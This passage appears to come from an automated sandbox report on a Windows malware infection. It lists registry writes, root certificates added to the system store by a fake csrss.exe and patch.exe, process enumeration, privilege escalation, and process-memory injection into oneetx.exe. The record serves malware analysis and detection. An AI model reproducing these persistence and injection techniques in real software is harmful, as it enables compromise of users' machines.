Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\schtasks.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2016 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 2016 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 2016 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 2016 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
